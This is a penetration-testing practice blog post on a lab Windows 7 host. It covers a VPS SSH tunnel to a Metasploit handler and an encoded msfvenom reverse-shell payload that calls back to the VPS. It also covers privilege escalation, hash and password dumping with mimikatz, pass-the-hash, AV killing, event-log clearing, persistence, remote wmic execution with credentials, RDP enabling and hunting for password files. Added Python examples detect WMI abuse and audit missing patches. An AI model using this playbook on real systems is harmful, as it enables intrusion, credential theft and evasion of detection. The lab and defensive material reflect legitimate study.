Penetration Testing Series - Local 1 - Internal Network Testing - Step 1 - Web Service Host Penetration

I plan to practice on four penetration instances, two local plus two real, and work through the techniques and the detail problems I ran into before and am running into now, one by one.

Local 1: web test + internal network test
Local 2: web test, classic PoCs for 10-odd web vulnerabilities
Real 1: web test (medium-low)
Real 2: web + internal network test (low)

Local 1: web test host Win7 -> Win12 domain controller -> CentOS 7 server

This post is step 1 of the internal network test for Local 1, reproducing it on the Win7 host obtained from the Local 1 web test.

I. VPS + local msf for forwarding into the internal network
II. Host enumeration with msf
III. A few supplementary information-gathering points
IV. Privilege escalation

I. VPS + local msf for forwarding into the internal network

Options: ew + msf, reg + msf, ssh + msf

Here ssh + msf is used.

References:

https://1sparrow.com/2018/01/20/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%80%BB%E7%BB%93/
https://evi1cg.me/archives/Port_Forward_using_VPS_SSH_Tunnel.html
https://blog.csdn.net/cayman_mg/article/details/79527207
https://www.zhukun.net/archives/8130
https://www.cnblogs.com/weishun/p/5189339.html
https://www.cnblogs.com/Hi-blog/p/7473752.html
https://www.cnblogs.com/hac425/p/9416774.html

1. Tunnel from local Kali

ssh -N -R 8998:192.168.118.128:8999 root@vps

Two points: first, the host IP is simply the local IP; second, port 8998 opened on the VPS must be added to the security-group rules (I use Aliyun here; at first there was no response, and it worked once I used a port already allowed by the rules).

2. Enable port forwarding on the VPS

Required in the local test; I believe the effect is the same in the VPS test.

vim /etc/ssh/sshd_config and set GatewayPorts yes

3. Start the listener in msf on local Kali

back
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.118.128
set lport 8999
set exitonsession false
exploit -j

4. Generate the client 1.exe

Behinder (冰蝎) has a reverse-shell feature, but in repeated tests it died immediately.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=vps LPORT=8998 -f exe > abc.exe

5. Run 1.exe on Win7.

II. Host enumeration with msf

References:

https://www.cnblogs.com/backlion/p/9484950.html
https://www.cnblogs.com/lsgxeva/p/8450277.html

I. Elevating privileges

1.getsystem
meterpreter > getuid
Server username: root-PC\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
2. exp
exit
back
3. Steal a user process's token:
steal_token
4. bypassuac
use exploit/windows/local/bypassuac
5. Steal user tokens via token impersonation
use incognito
list_tokens -u
impersonate_token

II. Getting passwords and hashes

1. A very good module
run post/windows/gather/smart_hashdump
2.
load mimikatz
mimikatz_command -f samdump::hashes
3.
hashdump
4. Elevate first, then test hashdump
use priv
run post/windows/gather/hashdump
5. With the hashes obtained, log in using pass-the-hash

III. Basic file operations

cat       view a file
edit      edit a file
upload    upload a file
download  download a file
rm        delete a file
mkdir     create a directory
rmdir     delete a directory

IV. Continued information gathering

run killav                                  kill antivirus software; use with caution
run post/windows/gather/checkvm             check whether this is a virtual machine
run post/windows/gather/enum_applications   list installed software
run post/windows/gather/dumplinks           get recent file activity
run scraper                                 collect assorted information
clearev                                     clear event logs

V. Persistence

Tested with persistence; the external write-ups on persistence all seem so-so, and for now this is the only method I found in msf; others will be covered separately.

References:

https://blog.csdn.net/weixin_44255856/article/details/98983680
https://blog.csdn.net/nzjdsds/article/details/83147361
http://www.secist.com/archives/725.html

III. A few supplementary information-gathering points:

1. If the AV really cannot be bypassed, grab passwords with PowerShell

2. Grabbing credentials with mimikatz

Grab password hashes

Grab Remote Desktop credentials (I did not find the credential file on either Win7 or Win10); reference: https://www.cnblogs.com/hookjoy/p/9133035.html

Log in to the domain controller with a golden ticket

3. Hash injection emulation with wce, PSEXEC, WMIEXEC etc. (untested): https://www.cnblogs.com/leixiao-/p/10586804.html

4. Getting cookies from Google Chrome, Firefox and IE

5. wmic commands

Reposted from: https://www.cnblogs.com/top5/p/3143827.html

Get system version information
wmic datafile where Name='c:\\windows\\explorer.exe' get Manufacturer,Version,Filename

Get system processes
wmic process list full
Note: full here can also be replaced with brief.

Get hardware information (CPU as an example)
wmic cpu get name,caption,maxclockspeed,description

Write the result to 1.txt on drive D
wmic /output:D:\1.txt cpu get name

wmic: get drive letters of fixed disk partitions:
wmic logicaldisk where "drivetype=3" get name

wmic: get the file system and free space of each fixed partition:
wmic logicaldisk where "drivetype=3" get name,filesystem,freespace

wmic: get process names and executable paths:
wmic process get name,executablepath

wmic: kill a specified process (by process name):
wmic process where name="qq.exe" call terminate
or
wmic process where name="qq.exe" delete

wmic: kill a specified process (by PID):
wmic process where pid="123" delete

wmic: create a new process
wmic process call create "C:\Program Files\Tencent\QQ\QQ.exe"

Create a new process on a remote machine:
wmic /node:192.168.1.10 /user:administrator /password:123456 process call create cmd.exe

Shut down the local computer
wmic process call create shutdown.exe

Restart a remote computer
wmic /node:192.168.1.10 /user:administrator /password:123456 process call create "shutdown.exe -r -f -m"

Rename the computer
wmic computersystem where "caption='%ComputerName%'" call rename newcomputername

Rename an account
wmic USERACCOUNT where "name='%UserName%'" call rename newUserName

wmic: terminate a suspicious process (by its executable path)
wmic process where "name='explorer.exe' and executablepath<>'%SystemDrive%\\windows\\explorer.exe'" delete

wmic: get physical memory
wmic memlogical get TotalPhysicalMemory|find /i /v "t"

wmic: get a file's creation, access and modification times
@echo off
wmic datafile where name^="c:\\windows\\system32\\notepad.exe" get CreationDate^,LastAccessed^,LastModified

wmic: search the whole disk for a file and get its directory
wmic datafile where "FileName='qq' and extension='exe'" get drive,path
for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j" &@echo %qPath:~0,-3%)

Get screen resolution
wmic DESKTOPMONITOR where Status='ok' get ScreenHeight,ScreenWidth

Get shared resources (including hidden shares)
WMIC share list brief

Get the USB drive letter and run QQ.exe from it
@for /f "skip=1 tokens=*" %i in ('wmic logicaldisk where "drivetype=2" get name') do (if not "%i"=="" start d:\qq.exe)

Get a process's current memory usage and its peak memory usage:
wmic process where caption='filename.exe' get WorkingSetSize,PeakWorkingSetSize

Change the current workgroup to a specified workgroup
wmic computersystem Where "name='计算机名称'" call UnjoinDomainOrWorkgroup

Leave the current domain
wmic computersystem Where "name='计算机名称'" call joindomainorworkgroup "",1,"域名称","域管理员密码","域管理员用户名"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Enable 3389 on Server 2003
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Remotely enable Remote Desktop on a computer
wmic /node:%pcname% /USER:%pcaccount% PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

Add a scheduled task; jobs added with wmic are also visible with the AT command
wmic job call create "sol.exe",0,0,true,false,********154800.000000+480
wmic job call create "sol.exe",0,0,1,0,********154600.000000+480
These two lines are equivalent: TRUE can be written as 1 and FALSE as 0. Why eight asterisks before the time? It is a WMIC characteristic: it represents time as YYYYMMDDHHMMSS.MMMMMM+timezone, but we do not need to specify the year, month and day, so asterisks replace them.

View BIOS information in wmic
wmic bios list full

wmic can also start, stop and pause services:
start a service with startservice, stop with stopservice, pause with pauseservice.
The command format is:
wmic Service where caption="windows time" call stopservice
-- stop the service
wmic Service where caption="windows time" call startservice
-- start the service
wmic Service where name="w32time" call stopservice
-- stop the service; note the difference between name and caption.


Create a process remotely
wmic /node:109.254.2.102 /user:"rdgad\administrator" /password:"1234" process call create commandline="cmd.exe /k echo xxxxx|clip.exe"
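
As a defender's counterpart to the wmic commands above, here is an added detection example (mine, not from the original post or the reposted source): it runs simple rules over constructed Sysmon-style process-creation records to flag shells spawned by WmiPrvSE.exe (how a remote "process call create" lands on the receiving host), wmic job creation, RDP enabling via SetAllowTSConnections, and wmic invoked with /node:. The JSON-lines layout and the sample records are assumptions.

```python
import json
import ntpath
import re

# Constructed JSON-lines process-creation records using Sysmon Event ID 1 field
# names; sample data written for this example, not real captures.
SAMPLE_EVENTS = r'''
{"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /k echo xxxxx|clip.exe", "User": "RDGAD\\administrator"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe", "User": "ROOT-PC\\user"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic job call create \"sol.exe\",0,0,true,false,********154800.000000+480", "User": "ROOT-PC\\Administrator"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic RDTOGGLE WHERE ServerName='ROOT-PC' call SetAllowTSConnections 1", "User": "ROOT-PC\\Administrator"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic /node:192.168.1.10 /user:administrator process call create cmd.exe", "User": "ROOT-PC\\Administrator"}
{"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic cpu get name", "User": "ROOT-PC\\user"}
'''

# Interpreters that should rarely be children of the WMI provider host.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Rules over the wmic command line (derived from the commands shown above).
WMIC_RULES = [
    ("wmic scheduled job created (visible with AT)", re.compile(r"\bjob\s+call\s+create\b", re.I)),
    ("RDP enabled through WMI", re.compile(r"SetAllowTSConnections\s+1", re.I)),
    ("wmic run against a remote host", re.compile(r"/node:", re.I)),
    ("process creation via WMI", re.compile(r"\bprocess\s+call\s+create\b", re.I)),
]

def check_event(ev):
    """Return the rule names matching one process-creation record."""
    parent = ntpath.basename(ev["ParentImage"]).lower()
    image = ntpath.basename(ev["Image"]).lower()
    hits = []
    # 'process call create' sent from another machine lands on the receiving
    # host as a child of WmiPrvSE.exe, so that parent/child pair is the signal.
    if parent == "wmiprvse.exe" and image in SHELLS:
        hits.append("shell spawned by WmiPrvSE.exe (remote WMI execution)")
    if image == "wmic.exe":
        hits.extend(name for name, rx in WMIC_RULES if rx.search(ev["CommandLine"]))
    return hits

def scan(jsonl):
    """Parse JSON-lines records; return (user, command line, rules) per hit."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            hits = check_event(ev)
            if hits:
                findings.append((ev["User"], ev["CommandLine"], hits))
    return findings
```

On real hosts the same pairing (WmiPrvSE.exe parent, shell child) is visible in Security event 4688 with parent process logging enabled, so the rule ports directly.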

6. Some commands

Reposted from: https://blog.csdn.net/qq_29647709/article/details/81514446

1. Collect OS name and version

systeminfo
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

2. Hostname and all environment variables

Hostname: hostname
Environment variables: SET

3. View user information

All users: net user or net1 user
Administrators group: net localgroup administrators or net1 localgroup administrators
Remote Desktop users currently logged on: query user or quser


4. Find the Remote Desktop port
(1) From the registry

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
The value returned is hexadecimal and must be converted to decimal
(2) From the command line

Get the PID of the service: tasklist /svc | find "TermService"
Find the port from the PID: netstat -ano | find "1980"



5. Check network status
(1) Network configuration: ipconfig /all
(2) Routing table: route print
(3) ARP cache: arp -A
(4) Network connections: netstat -ano
(5) Firewall rules:

netsh firewall show config
netsh firewall show state


6. Applications and services
(1) Service process IDs: tasklist /SVC
(2) Installed drivers: DRIVERQUERY
(3) Started Windows services: net start
(4) Service start permissions: sc qc TermService
(5) Installed programs: wmic product list brief
(6) Service list: wmic service list brief
(7) Process list: wmic process list brief
(8) Startup item list: wmic startup list brief



7. Search for sensitive files and directory operations

dir /b/s password.txt
dir /b /s *.doc
dir /b /s *.ppt
dir /b /s *.xls
dir /b /s *.docx
dir /b /s *.xlsx
dir /b/s config.* filesystem
findstr /si password *.xml *.ini *.txt
findstr /si login *.xml *.ini *.txt

(1) List all directories under d:\www:
for /d %i in (d:\www\*) do @echo %i
(2) Show the folders in the current path whose names are only 1-3 characters long:
for /d %i in (???) do @echo %i
(3) Using the current directory as the search path, list all EXE files in it and its subdirectories:
for /r %i in (*.exe) do @echo %i
(4) Using a specified directory as the search path, list all files in it and its subdirectories:
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
(5) Display the contents of a.txt; because of /f, it reads a.txt line by line:
for /f %i in (c:\1.txt) do echo %i
9. RAR packaging
rar a -k -r -s -m3 c:\1.rar d:\wwwroot
10. Read a file with php
c:/php/php.exe "c:/www/admin/1.php"



8. Script to automatically collect useful system information

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

7. Enable 3389

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

IV. Privilege escalation

1. Reference: https://blog.csdn.net/qq_29647709/article/details/81514446

Some vulnerability sites mentioned in that post:


1.
http://www.securityfocus.com/bid
https://packetstormsecurity.com/search/?q=MS16-016
https://technet.microsoft.com/library/security/ms08-068
http://www.exploit-db.com
2.
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/

2. Vulnerabilities and their corresponding patches (few; for reference only):

https://blog.csdn.net/jihaichen/article/details/80223561
https://www.kanxue.com/book-38-435.htm

There is an interesting piece of code:

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

3. Use the scripts in msf directly

Just this direct (post/windows/gather/enum_patches is noticeably faster than post/multi/recon/local_exploit_suggester):

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.118.131 - Collecting local exploits for x86/windows...
[*] 192.168.118.131 - 29 exploit checks are being tried...
[+] 192.168.118.131 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.118.131 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.118.131 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
meterpreter > run post/windows/gather/enum_patches

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1

Reference: https://www.360zhijia.com/anquan/422177.html (you can see that msf also bundles many useful scripts)
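
The batch one-liner in point 2 and the enum_patches output above both reduce to the same check: which KBs from a list are absent from systeminfo. This added Python example (mine, not from the original post) performs that patch audit on a constructed systeminfo excerpt and maps each missing KB to the bulletin that enum_patches named; the excerpt and its field layout are assumptions.

```python
import re

# Hotfixes the batch one-liner above checks for, copied from that list.
CHECKLIST_KBS = [
    "KB977165", "KB2160329", "KB2503665", "KB2592799", "KB2707511", "KB2829361", "KB2850851",
    "KB3000061", "KB3045171", "KB3077657", "KB3079904", "KB3134228", "KB3143141", "KB3141780",
]
# KB -> bulletin/exploit name, as reported in the enum_patches output above.
KB_BULLETINS = {
    "KB977165": "MS10-015 kitrap0d (Windows 2K SP4 - Windows 7 x86)",
    "KB2305420": "MS10-092 schelevator (Vista, 7 and 2008)",
    "KB2592799": "MS11-080 afdjoinleaf (XP SP2/SP3, 2003 SP2)",
    "KB2778930": "MS13-005 hwnd_broadcast (Low to Medium integrity)",
    "KB2850851": "MS13-053 schlamperei (x86 Win7 SP0/SP1)",
    "KB2870008": "MS13-081 track_popup_menu (x86 Win7 SP0/SP1)",
}

# Constructed systeminfo excerpt: sample data for this example, not a real host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 ROOT-PC
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB2592799
                           [03]: KB2850851
                           [04]: KB3000061
Network Card(s):           1 NIC(s) Installed.
"""

KB_RE = re.compile(r"\bKB\d{6,7}\b", re.I)

def installed_hotfixes(systeminfo_text):
    """KB ids present in systeminfo output (the same test 'find /i "%i"' makes)."""
    return {kb.upper() for kb in KB_RE.findall(systeminfo_text)}

def missing_patches(systeminfo_text, required=None):
    """Map each required-but-absent KB to its bulletin (None if enum_patches
    names none). Default required set: the checklist plus every KB above."""
    required = set(required if required is not None else CHECKLIST_KBS) | set(KB_BULLETINS)
    return {kb: KB_BULLETINS.get(kb) for kb in sorted(required - installed_hotfixes(systeminfo_text))}

def audit_report(systeminfo_text):
    """Report lines, bulletin-mapped gaps first since those are the priority fixes."""
    missing = missing_patches(systeminfo_text)
    lines = ["%s missing - %s" % (kb, why) for kb, why in missing.items() if why]
    return lines + ["%s missing" % kb for kb, why in missing.items() if not why]
```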

2019.9.17
